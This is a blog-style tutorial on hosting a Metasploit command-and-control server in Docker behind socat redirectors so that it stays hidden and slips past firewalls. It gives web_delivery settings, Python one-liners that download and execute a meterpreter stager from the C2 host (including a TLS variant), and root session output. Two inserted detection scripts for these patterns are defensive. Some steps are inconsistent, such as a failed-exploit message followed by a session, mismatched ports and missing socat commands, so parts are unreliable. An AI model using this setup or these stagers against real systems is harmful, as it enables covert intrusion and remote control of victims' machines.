Hosting and hiding your C2 with Docker and Socat
If you are looking for a way to run a simple command and control (C2) server that is not exposed to the internet, but still able to deliver payloads and handle sessions, you might want to consider using Docker and Socat. In this article, we will show you how to set up a C2 server with Metasploit using Docker and Socat, and how to use multiple socats to redirect your payload delivery and session handling correctly.
What are Docker and Socat?
Docker is a software platform that allows you to build, run, and share applications using containers. Containers are isolated environments that contain everything an application needs to run, such as code, libraries, dependencies, and configuration. Containers are lightweight, portable, and scalable, making them ideal for deploying applications across different platforms and environments.
Socat is a command line tool that allows you to establish two bidirectional byte streams and transfer data between them. Socat can be used for various purposes, such as forwarding ports, tunneling connections, proxying traffic, and more. Socat can handle different types of streams, such as TCP, UDP, SSL, files, pipes, etc.
Why use Docker and Socat for C2 hosting and hiding?
Using Docker and Socat for C2 hosting and hiding has several advantages:
Using containers gives you the "it always works" factor compared to manual installs. Since each Docker image is already built, you can just pull it and have everything working out of the box.
Docker greatly facilitates abstraction of networking and volumes, and makes for easy repeatable deployments.
You can keep your C2 container in a segmented Docker network, isolated from the outside. This way, you can avoid exposing your C2 server directly to the internet, and reduce the risk of detection and compromise.
You can use multiple socats to redirect your payload delivery and session handling to different ports on your Docker host. This way, you can bypass firewall rules or network restrictions that might block your C2 traffic.
You can also use socat to add encryption or authentication to your C2 traffic, by using SSL or proxy options.
How to set up a C2 server with Docker and Socat?
In this section, we will walk you through the steps of setting up a C2 server with Docker and Socat. We will use Metasploit as our C2 framework, but you can adapt the steps to any other C2 tool of your choice.
Step 1: Install Docker on your VPS
The first step is to install Docker on your virtual private server (VPS) that will host your C2 server. You can use any VPS provider that offers Ubuntu or any other Linux distribution that supports Docker. There are some free or very cheap options out there.
To install Docker on Ubuntu, follow these instructions:
Update the apt package index and install packages to allow apt to use a repository over HTTPS:
sudo apt-get update
sudo apt-get install \
    apt-transport-https \
    ca-certificates \
    curl \
    gnupg \
    lsb-release
Add Docker's official GPG key (the curl output must be piped into gpg):
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo gpg --dearmor -o /usr/share/keyrings/docker-archive-keyring.gpg
Set up the stable repository:
echo \
  "deb [arch=amd64 signed-by=/usr/share/keyrings/docker-archive-keyring.gpg] https://download.docker.com/linux/ubuntu \
  $(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null
Update the apt package index again:
sudo apt-get update
Install the latest version of Docker Engine:
sudo apt-get install docker-ce docker-ce-cli containerd.io
To verify that Docker is installed correctly, run the hello-world image:
sudo docker run hello-world
You should see a message like this:
Hello from Docker!
This message shows that your installation appears to be working correctly.
...
Step 2: Create a Metasploit container
The next step is to create a Metasploit container that will run our C2 server. We will use the official Metasploit image from Docker Hub and attach it to our c2-net network, a user-defined bridge network created beforehand with docker network create so that the container is kept off the host's default network. We will also mount a volume to persist our Metasploit configuration and data.
To create a Metasploit container, run this command:
sudo docker run --rm -it -v $HOME/.msf4:/root/.msf4 --network=c2-net --name msf metasploitframework/metasploit-framework
This will pull the Metasploit image if you don't have it already, and start an interactive shell with Metasploit. You should see something like this:
=[ metasploit v6.0.48-dev ]
+ -- --=[ 2129 exploits - 1138 auxiliary - 365 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
Metasploit tip: Use help to learn more about any command
msf6 >
You can now use Metasploit commands to set up your C2 server.
Step 3: Set up your C2 server with Metasploit
In this step, we will use Metasploit to generate a payload and a handler for our C2 server. We will use the web_delivery module to serve our payload over HTTP, and the reverse_http meterpreter payload to handle our sessions.
To set up your C2 server with Metasploit, follow these instructions:
Load the web_delivery module:
msf6 > use exploit/multi/script/web_delivery
Set the target to Python:
msf6 exploit(multi/script/web_delivery) > set target Python
target => Python
Set the payload to python/meterpreter/reverse_http:
msf6 exploit(multi/script/web_delivery) > set payload python/meterpreter/reverse_http
payload => python/meterpreter/reverse_http
Set the LHOST option to your VPS IP address:
msf6 exploit(multi/script/web_delivery) > set LHOST 192.168.1.100
LHOST => 192.168.1.100
Set the LPORT option to 80 (the port that socat will redirect to our handler):
msf6 exploit(multi/script/web_delivery) > set LPORT 80
LPORT => 80
Set the SRVHOST option to 0.0.0.0 (to listen on all interfaces):
msf6 exploit(multi/script/web_delivery) > set SRVHOST 0.0.0.0
SRVHOST => 0.0.0.0
Set the SRVPORT option to 8080 (the port that socat will redirect to our web delivery server):
msf6 exploit(multi/script/web_delivery) > set SRVPORT 8080
SRVPORT => 8080
Set the URIPATH option to / (to serve the payload at the root path):
msf6 exploit(multi/script/web_delivery) > set URIPATH /
URIPATH => /
Show the options to verify that everything is correct:
msf6 exploit(multi/script/web_delivery) > show options
Module options (exploit/multi/script/web_delivery):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom
Step 4: Deliver and execute your payload
Now that your C2 server is ready, you need to deliver and execute your payload on the target machine. The web_delivery module will generate a one-liner command that you can use to download and run the payload from your C2 server.
To deliver and execute your payload, follow these instructions:
Run the web_delivery module:
msf6 exploit(multi/script/web_delivery) > run
Copy the command that is displayed on the screen. It should look something like this:
[-] Exploit failed: The following options failed to validate: LHOST.
[*] Exploit completed, but no session was created.
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.1.100:8080/
[*] Server started.
[*] Run the following command on the target machine:
python -c "import urllib2; r = urllib2.urlopen('http://192.168.1.100:443/'); exec(r.read());"
Paste the command on the target machine's terminal and press enter. This will download and execute the payload from your C2 server.
Go back to your Metasploit console and check if you have a session:
msf6 exploit(multi/script/web_delivery) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter python/linux root @ ubuntu (uid=0, gid=0, euid=0) 192.168.1.100:80 -> 192.168.1.101:54321 (192.168.1.101)
Interact with the session and enjoy your shell:
msf6 exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : ubuntu
OS : Linux 5.4.0-66-generic #74-Ubuntu SMP Wed Jan 27 22:54:38 UTC 2021
Architecture : x64
System Language : en_US
Meterpreter : python/linux
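The one-liner that web_delivery prints is also the thing a defender can see: an inline interpreter invocation that fetches a URL and immediately exec()s the response. The following script, added here as an example and not part of the original article, runs that check over constructed process-creation records (the kind an EDR or auditd pipeline emits). The two records that mirror the article's one-liners are flagged; the benign inline-Python and service records are not. Field names (host, user, cmdline) are assumptions about the telemetry format.

```python
import re

# Constructed process-creation records (as an EDR or auditd pipeline might emit them);
# the first two mirror the article's one-liners, the rest are benign look-alikes.
SAMPLE_EVENTS = [
    {"host": "ubuntu", "user": "root",
     "cmdline": "python -c \"import urllib2; r = urllib2.urlopen('http://192.168.1.100:443/'); exec(r.read());\""},
    {"host": "ubuntu", "user": "root",
     "cmdline": "python -c \"import urllib2, ssl; r = urllib2.urlopen('https://192.168.1.100:8443/', "
                "context=ssl._create_unverified_context()); exec(r.read());\""},
    {"host": "build01", "user": "jenkins",
     "cmdline": "python -c \"import json, sys; print(json.load(sys.stdin)['version'])\""},
    {"host": "web02", "user": "www-data", "cmdline": "/usr/bin/python3 manage.py runserver"},
    {"host": "dev03", "user": "alice",
     "cmdline": "python3 -c \"import urllib.request as u; exec(u.urlopen('http://10.0.0.5:8000/s').read())\""},
]

# Each pattern captures one building block of a download-and-execute stager.
INLINE_INTERPRETER = re.compile(r"\bpython[23]?(?:\.\d+)?\s+-c\b")
REMOTE_FETCH = re.compile(r"urllib2\.urlopen|urllib\.request|\burlopen\(|requests\.get\(")
EXEC_OF_CONTENT = re.compile(r"\b(?:exec|eval)\s*\(")
TLS_VERIFY_DISABLED = re.compile(r"_create_unverified_context|CERT_NONE|verify\s*=\s*False")
URL = re.compile(r"https?://[^\s'\"]+")


def analyze(cmdline):
    """Return (indicator names, URLs) found in one command line."""
    indicators = []
    if INLINE_INTERPRETER.search(cmdline):
        indicators.append("inline_interpreter")
    if REMOTE_FETCH.search(cmdline):
        indicators.append("remote_fetch")
    if EXEC_OF_CONTENT.search(cmdline):
        indicators.append("exec_of_content")
    if TLS_VERIFY_DISABLED.search(cmdline):
        indicators.append("tls_verification_disabled")
    return indicators, URL.findall(cmdline)


def is_download_exec(cmdline):
    """A stager fetches remote content and executes it; either half alone is ordinary scripting."""
    indicators, _ = analyze(cmdline)
    return "remote_fetch" in indicators and "exec_of_content" in indicators


def scan(events):
    """Return one finding per event that matches the download-and-execute pattern."""
    findings = []
    for ev in events:
        if not is_download_exec(ev["cmdline"]):
            continue
        indicators, urls = analyze(ev["cmdline"])
        findings.append({"host": ev["host"], "user": ev["user"],
                         "indicators": indicators, "urls": urls})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f['host']}/{f['user']}: {', '.join(f['indicators'])} -> {f['urls']}")
```

The rule deliberately requires both a fetch and an exec/eval before alerting, because either alone is common in build scripts; the disabled-TLS-verification indicator is recorded separately so that the HTTPS variant from Step 5 raises the severity rather than a second alert. The extracted URLs are what you would hand to network and proxy logs for pivoting.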
Step 5: Add encryption and authentication to your C2 traffic
As a bonus step, you can also use socat to add encryption and authentication to your C2 traffic. This will make your C2 communication more secure and stealthy, by preventing eavesdropping and tampering.
To add encryption and authentication to your C2 traffic, follow these instructions:
Generate a self-signed SSL certificate and key on your VPS:
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
Copy the cert.pem file to your target machine. You can use scp, wget, curl, or any other method you prefer.
Modify the socat command for the payload delivery route to terminate TLS. Socat has no ssl option on a TCP4-LISTEN address; TLS listening is done with the OPENSSL-LISTEN address type, with the cert and key options pointing at cert.pem and key.pem. The two files must be mounted into the socat container so it can read them, and verify=0 is needed because the one-liner below does not present a client certificate. You also need to change the port from 443 to 8443, or any other port that is not blocked by your firewall:
docker run --rm -d -p 8443:8443 --network=c2-net --name socat_delivery -v "$PWD/cert.pem:/certs/cert.pem:ro" -v "$PWD/key.pem:/certs/key.pem:ro" alpine/socat -v OPENSSL-LISTEN:8443,fork,reuseaddr,cert=/certs/cert.pem,key=/certs/key.pem,verify=0 TCP4:msf:8080
Modify the socat command for the session handling route in the same way: use OPENSSL-LISTEN with the mounted cert.pem and key.pem, and change the port from 80 to 8080, or any other port that is not blocked by your firewall:
docker run --rm -d -p 8080:8080 --network=c2-net --name socat_handler -v "$PWD/cert.pem:/certs/cert.pem:ro" -v "$PWD/key.pem:/certs/key.pem:ro" alpine/socat -v OPENSSL-LISTEN:8080,fork,reuseaddr,cert=/certs/cert.pem,key=/certs/key.pem,verify=0 TCP4:msf:4444
Modify the Metasploit payload to use SSL. You need to change the payload from python/meterpreter/reverse_http to python/meterpreter/reverse_https, and set the LPORT option to 8080 (the port that socat will redirect to our handler):
msf6 exploit(multi/script/web_delivery) > set payload python/meterpreter/reverse_https
payload => python/meterpreter/reverse_https
msf6 exploit(multi/script/web_delivery) > set LPORT 8080
LPORT => 8080
Modify the one-liner command to use SSL. You need to change the URL scheme from http to https and pass an unverified SSL context (the Python equivalent of wget's --no-check-certificate) so that the self-signed certificate is accepted; this requires importing the ssl module alongside urllib2:
python -c "import urllib2, ssl; r = urllib2.urlopen('https://192.168.1.100:8443/', context=ssl._create_unverified_context()); exec(r.read());"
Run the modified one-liner command on the target machine and check if you have a session with SSL enabled:
msf6 exploit(multi/script/web_delivery) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter python/linux root @ ubuntu (uid=0, gid=0, euid=0) 192.168.1.100:8080 -> 192.168.1.101:54321 (192.168.1.101)
Encryption : OpenSSL with cipher AES256-SHA256
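Wrapping the traffic in TLS hides its contents, but not its shape: the flow described in Steps 4 and 5 is a single fetch from one port of a host followed by regular check-ins to a second port of the same host. The following script, added here as an example and not part of the original article, looks for exactly that pairing in constructed connection records modelled loosely on a Zeek conn.log (timestamp, source, destination, destination port). The thresholds (at least five check-ins, relative interval spread at most 0.25) are assumptions chosen for the sample data; the one client that mirrors the article's flow is flagged, while an intranet browsing session and an irregular two-port conversation are not.

```python
from collections import defaultdict
from statistics import mean, pstdev

# Constructed connection records (timestamp in seconds, source IP, destination IP, destination port),
# in the spirit of a Zeek conn.log. The first client mirrors the article's flow: one fetch from the
# delivery port, then regular check-ins to the handler port on the same host. The others are benign.
SAMPLE_CONNS = [
    (1000.0, "192.168.1.101", "192.168.1.100", 8443),
    (1005.0, "192.168.1.101", "192.168.1.100", 8080),
    (1015.2, "192.168.1.101", "192.168.1.100", 8080),
    (1025.1, "192.168.1.101", "192.168.1.100", 8080),
    (1034.9, "192.168.1.101", "192.168.1.100", 8080),
    (1045.0, "192.168.1.101", "192.168.1.100", 8080),
    (1055.1, "192.168.1.101", "192.168.1.100", 8080),
    (1064.8, "192.168.1.101", "192.168.1.100", 8080),
    (1075.0, "192.168.1.101", "192.168.1.100", 8080),
    # a workstation browsing an intranet server: many connections, one port, irregular timing
    (1003.0, "192.168.1.102", "10.0.0.20", 443),
    (1010.0, "192.168.1.102", "10.0.0.20", 443),
    (1090.0, "192.168.1.102", "10.0.0.20", 443),
    (1091.0, "192.168.1.102", "10.0.0.20", 443),
    (1400.0, "192.168.1.102", "10.0.0.20", 443),
    # a host talking to a server on two ports, but with human-paced, irregular gaps
    (2000.0, "192.168.1.103", "10.0.0.30", 80),
    (2000.0, "192.168.1.103", "10.0.0.30", 443),
    (2003.0, "192.168.1.103", "10.0.0.30", 443),
    (2050.0, "192.168.1.103", "10.0.0.30", 443),
    (2051.0, "192.168.1.103", "10.0.0.30", 443),
    (2400.0, "192.168.1.103", "10.0.0.30", 443),
    (2401.0, "192.168.1.103", "10.0.0.30", 443),
]


def interval_stats(times):
    """Mean gap between consecutive connections and its relative spread (pstdev / mean)."""
    times = sorted(times)
    gaps = [b - a for a, b in zip(times, times[1:])]
    m = mean(gaps)
    if m <= 0:
        return m, float("inf")
    return m, pstdev(gaps) / m


def detect_beacons(conns, min_checkins=5, max_jitter=0.25):
    """Flag (src, dst) pairs where one port saw a one-off fetch and another saw regular check-ins."""
    by_pair = defaultdict(lambda: defaultdict(list))
    for ts, src, dst, dport in conns:
        by_pair[(src, dst)][dport].append(ts)

    findings = []
    for (src, dst), ports in by_pair.items():
        if len(ports) < 2:
            continue  # the pattern needs a delivery port and a separate handler port
        # ports touched only once or twice are candidate delivery ports
        fetch_ports = sorted(p for p, t in ports.items() if len(t) <= 2)
        for port, times in ports.items():
            if len(times) < min_checkins or port in fetch_ports:
                continue
            interval, jitter = interval_stats(times)
            if jitter <= max_jitter and fetch_ports:
                findings.append({"src": src, "dst": dst, "beacon_port": port,
                                 "interval": interval, "jitter": jitter,
                                 "fetch_ports": fetch_ports})
    return findings


if __name__ == "__main__":
    for f in detect_beacons(SAMPLE_CONNS):
        print(f"{f['src']} -> {f['dst']}: fetch on {f['fetch_ports']}, "
              f"check-ins on {f['beacon_port']} every ~{f['interval']:.1f}s (jitter {f['jitter']:.2f})")
```

Relative spread (standard deviation divided by mean) is used rather than an absolute tolerance so the same threshold works for a 10-second and a 10-minute check-in interval. On a real network you would run this over connections to destinations not seen before and combine it with the host-side one-liner detection above, since either signal alone produces false positives.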
Conclusion
In this article, we have shown you how to host and hide your C2 server with Docker and Socat. We have demonstrated how to use Docker to create an isolated network and run a Metasploit C2 server in a container, how to use Socat to redirect your payload delivery and session handling to different ports on your Docker host, and how to add encryption and authentication to your C2 traffic. We hope you have found this article useful and informative. If you have any questions or feedback, please feel free to leave a comment below.